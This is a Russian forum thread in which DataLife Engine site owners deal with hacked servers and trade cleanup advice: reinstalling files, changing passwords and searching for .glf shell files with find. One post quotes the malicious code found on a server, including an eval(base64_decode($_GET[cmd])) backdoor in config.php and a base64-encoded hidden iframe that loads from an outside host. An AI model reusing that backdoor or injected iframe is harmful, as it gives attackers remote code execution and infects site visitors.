Перейти к публикации

Рекомендованные сообщения

Собственно вчера обновился до ласт версии.

Снес все, оставил только upload и templates - который на локальном компе почистил от файлов .glf (shell)

Сегодня опять в папке енжине залит хтаксесс на запуск .glf как php и вставили вверх кода странички ифрейм.

!!!проверяю антивирусом встроенным и он не показывает новые файлы неизвестные дистрибьютиву, как с этим бороться?

<nofollow><noindex><div style=position:absolute;left:-900px;width:900px><iframe src=http://tonykmont.net/pics/12 width=0 height=0 style=display: none></iframe>

Путем изменения шаблона сделал вывод что фрейм вставили не через темплейты.

Спецом из дистрибьютива закачал дефолтный шаблон и активировал, ифрем есть - этой операцией я исключил правки файлов шаблона.

Далее перезалил папку енджине и не только, ифрем на месте.

Есть идеи?

Ссылка на сообщение
Поделиться на других сайтах

Далее перезалил папку енджине и не только, ифрем на месте.

Есть идеи?

смотрите файлы настроек в папке engine/data/ при перезаливке дистрибутива они не обновляются. Скорее всего он там у вас шелл.

Ссылка на сообщение
Поделиться на других сайтах

Далее перезалил папку енджине и не только, ифрем на месте.

Есть идеи?

смотрите файлы настроек в папке engine/data/ при перезаливке дистрибутива они не обновляются. Скорее всего он там у вас шелл.

действительно, в конфиг.пвп

такая фигня.

'lang_&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#123;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#036;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#123;@eval(base64_decode(&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#036;_GET[cmd]))&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#125;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#125;' => "",

и в дбконфиг

$db = new db;

print base64_decode("DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQo8bm9mb2xsb3c+PG5vaW5kZXg+PGRpdiBzdHlsZT1wb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi05MDBweDt3aWR0aDo5MDBweD48aWZyYW1lIHNyYz1odHRwOi8vdG9ueWttb250Lm5ldC9waWNzLzEyIHdpZHRoPTAgaGVpZ2h0PTAgc3R5bGU9ZGlzcGxheTogbm9uZT48L2lmcmFtZT4NCjwvZGl2Pjwvbm9mb2xsb3c+PC9ub2luZGV4Pg==");

что это такое и как с помощью этого можно залить шел?

п.с

Спасибо, помогло, скажите, а что это за код - да еще в конфиге который появляется первой строкой?

Может у меня в папке upload еще шелы лежат, там папок очень много. как можно расшифровать код?

Ссылка на сообщение
Поделиться на других сайтах

inspektor,

Удалять нужно все, а не расшифровкой заниматься, а изначально у вас проблема возникла потому что вовремя не установили патчи безопасности на свой сервер http://dle-news.ru/bags/

Кстати теперь зайдите в админпанель и удалите всех администраторов, кроме себя, у себя смените пароль, также проверьте настройки групп, чтобы не у кого не было доступа к админпанели, кроме вашей группы, также смените пароли на MySQL

Ссылка на сообщение
Поделиться на других сайтах

сменил все пароли, проверил права и юзеров.

Единственное непонятно почему внутренний антивирь не показал лишний файл .glf

Ссылка на сообщение
Поделиться на других сайтах

Несколько дней назад тоже пришлось решить аналогичную проблему с шеллом.

Прибила все лишние файлы, нового админа и поправила конфиги, а сегодня получила письмо от Яндекса:

На страницах вашего сайта обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных.

В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

При переходе на страницу веб-мастера у Яндекса выведен результат:

Яндекс проверяет страницы сайта выборочно, поэтому список зараженных страниц может быть неполным. Пожалуйста, проверьте и другие страницы, а также элементы, общие для всех страниц.

---

Дата последней проверки: 9.10.2010

Проверяю сайт на вирусы на сервере "бурбона"... результат неутешительный:

На странице http://www..... возможно есть вредоносный код!

Патчи безопасности все установлены!

Help me, please!

Ссылка на сообщение
Поделиться на других сайтах

Help me, please!

начните с чистки своего компа. потом менять пароли на фтп, базу, удалить все кроме картинок, перезалить файлы скрипта из дистрибутива

и в конце концов почитать форум, миллион раз писали.

Ссылка на сообщение
Поделиться на других сайтах

Help me, please!

начните с чистки своего компа. потом менять пароли на фтп, базу, удалить все кроме картинок, перезалить файлы скрипта из дистрибутива

и в конце концов почитать форум, миллион раз писали.

Все это произведено и не раз!

И пароли поменяла и файлы на ФТП. Комп без вирусов. И?

Ссылка на сообщение
Поделиться на других сайтах

Все это произведено и не раз!

значит плохо произведено. вы поймите простую вещь, если бы дело было в дле, щас бы тысячи админов выли волками.

И пароли поменяла и файлы на ФТП. Комп без вирусов. И?

ага, старые песни о главном ;)

ну, не можете сами разобраться, наймите нормального админа.

Ссылка на сообщение
Поделиться на других сайтах

Слушайте, prikindel!

Если Вам говорят, что все пароли изменены (файлы залиты из дистрибутива) сразу же после обнаружения "левых" файлов и админа, это не значит, что только на словах!

Не считайте себя самым умным, Вы наш "сильно нормальный"! :ph34r:

Ссылка на сообщение
Поделиться на других сайтах

значит плохо произведено. вы поймите простую вещь, если бы дело было в дле, щас бы тысячи админов выли волками.

Да они собственно и воют, только дело не в DLE, а как мне кажется в phpMyAdmin, через него и заливали коды прям в базу. Не зря же хостеры несколько недель назад ринулись его обновлять.

Hydrargyrum, попробуйте скачать базу, а затем поиском и заменой вычистить код. Он скорее всего у Вас, как и у остальных пострадавших, записан в таблице с полной новостью.

Ссылка на сообщение
Поделиться на других сайтах

Не считайте себя самым умным, Вы наш "сильно нормальный"! :ph34r:

выпейте валерьянки, дышите глубже ;) и самое главное, включите логику.

phpMyAdmin

для пхпмайадмина все равно нужен доступ к базе. с другой стороны, если есть доступ к базе, то майадмин вообще не нужен.

а обновления - их, по-любому, надо делать всегда своевременно, это ж аксиома.

кстати, ты про какой именно баг писал, я пока нашел про dd_ssh, или есть еще какие то? буду признателен.

поиском и заменой вычистить код

об этом уже писалось, но леди предпочитает не читать форум.

Ссылка на сообщение
Поделиться на других сайтах

вообщем сегодня опять залили .hlf

я уже незнаю что делать.

помогла перезаливка папки engine - перд этим запустил антивирус, он ничего не нашел. и как это можно назвать? явно было изменение пвп файла.

вообщем сегодня опять залили .hlf

я уже незнаю что делать.

помогла перезаливка папки engine - перд этим запустил антивирус, он ничего не нашел. и как это можно назвать? явно было изменение пхп файла.

Может знает кто как в линуксе через ssh запустить команду на поиск всех файлов с расширением .glf?

Изменено пользователем inspektor
Ссылка на сообщение
Поделиться на других сайтах

для пхпмайадмина все равно нужен доступ к базе. с другой стороны, если есть доступ к базе, то майадмин вообще не нужен.

Вы ошибаетесь в сфере недавно найденной уязвимости для MyPHPAdmin там не нужен никакой доступ, можно было легко получать доступ над всем сервером, в том числе и заливать шеллы, при этом не нужно было иметь никаких доступов.

вообщем сегодня опять залили .hlf

я уже незнаю что делать.

помогла перезаливка папки engine - перд этим запустил антивирус, он ничего не нашел. и как это можно назвать? явно было изменение пвп файла.

отправляйте запрос в службу поддержки http://dle-news.ru/index.php?do=feedback предоставляйте доступ к админпанели, и по FTP чтобы проверили ваш сервер и что у вас там стоит. Внимание при проверке будут удалены все сторонние модули и PHP файлы с вашего сервера не имеющие отношения к стандартному скрипту DLE

Сегодня опять в папке енжине залит хтаксесс на запуск .glf как php и вставили вверх кода странички ифрейм.

кстати на эту папку не должно быть никаких прав на запись, значит залит файл либо через FTP или при помощи уязвимого ПО сервера, либо у вас в нарушения всех инструкций по непонятным причинам на папку стоят права на запись

Ссылка на сообщение
Поделиться на других сайтах

в сфере недавно найденной уязвимости

неплохо ;)

поэтому выше и поинтересовался, dd_ssh или какая то другая ? их там просто достаточно много существует менее или более опасных

если в курсе, подскажите название или трэкинг номер какой то

Ссылка на сообщение
Поделиться на других сайтах

Может знает кто как в линуксе через ssh запустить команду на поиск всех файлов с расширением .glf?

find / -name "*glf"

Ссылка на сообщение
Поделиться на других сайтах

поэтому выше и поинтересовался, dd_ssh или какая то другая ?

нет, обыкновенная XSS, но очень серьезная, шелы заливаться очень легко и без каких либо доступов, их описания есть на странице http://www.phpmyadmin.net/home_page/security/

Ссылка на сообщение
Поделиться на других сайтах

Может знает кто как в линуксе через ssh запустить команду на поиск всех файлов с расширением .glf?

find / -name "*glf"

спс.

Подскажи как сделать поиск только в нужной папке а то начинает шерстить весь сервер и результаты уходят вверх - аж невидно.)

Ссылка на сообщение
Поделиться на других сайтах

find /folder1/folder2/ -name "*glf"

Будет искать в папке folder2, а если хочешь видеть по чуть-чуть, то пиши так:

find /folder1/folder2/ -name "*glf"|more

и когда будешь нажимать "Enter", то будет показывать по чуть-чуть :) Или же можешь всё найденное сохранить в файл:

find /folder1/folder2/ -name "*glf" > /folder1/folder2/123.txt

В в файле 123.txt будет всё, что нашло.

Ссылка на сообщение
Поделиться на других сайтах

об этом уже писалось, но леди предпочитает не читать форум.

Леди, да будет тебе известно, малыш, нашла и удалила лишний код еще до обращения с вопросом на форум.

===

По-поводу моей просьбы о помощи..

Извиняюсь, народ, ложное срабатывание.. Яндекс, оказывается, запоздалую статистику выслал..

Вчера запросила новую проверку, сегодня пришло сообщение:

Последняя перепроверка сайта не выявила страниц, содержащих вредоносный код.

Рано я запаниковала.. Думала, может в базе что-то или в каком-нить файле скрыто (мной пропущено)..

По дате был изменен только один файл - dbconfig. Остальные тогда проверила на всякий случай, для успокоения..

Лишний файл (GLF) в папке upload прибила сразу при обнаружении.. В других директориях подобного не обнаружилось..

.htaccess-ы соответствовали оригиналам.. т.е. исправлены не были..

Ссылка на сообщение
Поделиться на других сайтах

вот спасибо.

удобно find / -name "*glf" > 1.txt сохраняет все файлы с путями у которых расширение glf.

2.celsoft

обнаружил еще .glf в папках других сайтов - которые не на дле, прибил, дальше буду смотреть.

Ссылка на сообщение
Поделиться на других сайтах

удобно find / -name "*glf" > 1.txt сохраняет все файлы с путями у которых расширение glf.

Сюда могут попадать и файлы и именами: abcglf

По этому Вам надо делать такой запрос:

find / -name "*.glf" > 1.txt
Изменено пользователем WWW.ZEOS.IN
Ссылка на сообщение
Поделиться на других сайтах

удобно find / -name "*glf" > 1.txt сохраняет все файлы с путями у которых расширение glf.

Сюда могут попадать и файлы и именами: abcglf

По этому Вам надо делать такой запрос:

find / -name "*.glf" > 1.txt

большое человеческое спасибо.

Проблема вроде решена, поудалял на всем сервере все глфки, полет пока нормальный.

Изменено пользователем inspektor
Ссылка на сообщение
Поделиться на других сайтах

Столкнулся по-полной с описанной проблемой :(...

Вроде вычистил.

Только заплатка предлагается с 7.**-й версии, а у меня 6.7 и ниже стоят, нет каких-то способов пофиксить проблему от самопровозглашённых "админов"?

http://bestsafari.org

Изменено пользователем biggamehunter
Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...